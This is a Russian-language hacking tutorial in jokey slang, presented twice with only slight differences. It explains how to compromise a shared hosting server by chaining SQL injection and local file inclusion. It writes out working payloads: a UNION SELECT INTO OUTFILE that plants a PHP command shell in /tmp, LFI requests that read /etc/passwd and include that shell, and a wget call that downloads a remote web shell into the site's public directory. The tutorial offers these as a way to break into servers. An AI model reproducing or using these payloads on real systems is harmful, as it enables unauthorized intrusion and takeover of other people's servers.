Подготовка:
Итак речь пойдёт об очинь изящном и важном способе захватить целевой сервер. О чом многие хацкеры даже не думают тык ето о том што очинь даже неплохо когда сервер хостит много сайтов.
Скажем мы выбрали цель(сервак), делаем реверс IP lookup, штоб узнать скока сайтов захостено там. Тык вот, сервер значт хостит 5 сайтов к премеру. После тыкания и скана на уязвимости на всех 5 сайтах, находим один каторый уязвим для SQLi и другой каторый уязвим для LFi.
Атака:
Естессно большинство хацкеров выберут SQLi штоб взять учотку админа и попробывать залогиницца, потомушто ето быстрее нежели через LFi если /proc/self/environ не представлен на LFi-уязвимом сайте.
Такшто впринцыпе мы всё делаем в етом случае верно, но когда мы пробуем залогиницца с учоткой которую мы увели из ДБ, она оказываецца устаревшей и вооще беспонтовой.
Чо теперь? Сдадимся? Не.
Атака 1.
Итак, если у нас есть верные привелегии в SQLi конкретново юзера, мы можым прописать файлы на сервер через скуль. Итак, мы будим добавлять файл в папку в которую можно записывать, как правило папка temp записываемая, посему нам надо записать туда однолинейный шелл каторый позволит нам выполнять команды на сервере. Ну типа как php шелл, тока миниатюрный и который юзаецца через урл, безо всяких интерфейсов.
Тут мы закидываем cmd.txt каторый являецца нашим шеллом в tmp папку, каторая являецца записываемой. Обыкновенный скуль, 5 колонок, 1-я юзаецца для получения данных, так же, как и при получении версии version(), и просто добавляя в outfile"/tmp/cmd.txt" в конец синтаксиса.
ТЕперь наш шелл создан и мы юзаем $cmd различные.
Атака 2.
Теперь когда у нас есть наш файло на серваке вернёмся к нашему LFi уязвимому сайту, который на том же сервере и прочтём cmd.txt, попробуем выполнить команду и надеемся на то што шелл поднимецца. Етот шаг довольно прост.
Типичная уязвимость LFI :
Читаем cmd.txt
Прочтём CMD.txt by используя LFI уязвимость:
Запускаем команду на CMD.txt используя LFI уязвимость:
(Ето запустит $cmd variable в cmd.txt, штоб выполнить wget команду которая сольёт текстовый файло с нашево сервака, каторый являецца php шеллом с .тхт расширением и -O /full-path-of-site/public_html/shell.php команда переименует файло в shell.php, и конешно нам надо найти полный путь туда, штобы мы могли слить наш шелл в папку из которой мы можем открыть наш шелл браузером)
Открываем шелл:
(Мы залили шелл юзая LFi уязвимость сайта, так што шелл пайдёт в root папку("hosting directory") сайта где мы ево сохранили)
Всё, сервер благополучно взломан.
Трюк забавный, короткий а главное действенный.
Итак речь пойдёт об очинь изящном и важном способе захватить целевой сервер. О чом многие хацкеры даже не думают тык ето о том што очинь даже неплохо когда сервер хостит много сайтов.
Скажем мы выбрали цель(сервак), делаем реверс IP lookup, штоб узнать скока сайтов захостено там. Тык вот, сервер значт хостит 5 сайтов к премеру. После тыкания и скана на уязвимости на всех 5 сайтах, находим один каторый уязвим для SQLi и другой каторый уязвим для LFi.
Атака:
Естессно большинство хацкеров выберут SQLi штоб взять учотку админа и попробывать залогиницца, потомушто ето быстрее нежели через LFi если /proc/self/environ не представлен на LFi-уязвимом сайте.
Такшто впринцыпе мы всё делаем в етом случае верно, но когда мы пробуем залогиницца с учоткой которую мы увели из ДБ, она оказываецца устаревшей и вооще беспонтовой.
Чо теперь? Сдадимся? Не.
Атака 1.
Итак, если у нас есть верные привелегии в SQLi конкретново юзера, мы можым прописать файлы на сервер через скуль. Итак, мы будим добавлять файл в папку в которую можно записывать, как правило папка temp записываемая, посему нам надо записать туда однолинейный шелл каторый позволит нам выполнять команды на сервере. Ну типа как php шелл, тока миниатюрный и который юзаецца через урл, безо всяких интерфейсов.
Код:
http://www.site.com/index.php?ID=-1 union select '<?system($_GET[cmd])?>',2,3,4,5 into outfile "/tmp/cmd.txt"--
ТЕперь наш шелл создан и мы юзаем $cmd различные.
Атака 2.
Теперь когда у нас есть наш файло на серваке вернёмся к нашему LFi уязвимому сайту, который на том же сервере и прочтём cmd.txt, попробуем выполнить команду и надеемся на то што шелл поднимецца. Етот шаг довольно прост.
Типичная уязвимость LFI :
Код:
http://www.site.com/index.php?file=../etc/passwd
Прочтём CMD.txt by используя LFI уязвимость:
Код:
http://www.site.com/index.php?file=../tmp/cmd.txt
Код:
http://www.site.com/index.php?file=../tmp/cmd.txt&cmd=wget http://[email protected]/myshell.txt -O /full-path-of-site/public_html/shell.php
Открываем шелл:
Код:
http://www.site.com/shell.php
Всё, сервер благополучно взломан.
Трюк забавный, короткий а главное действенный.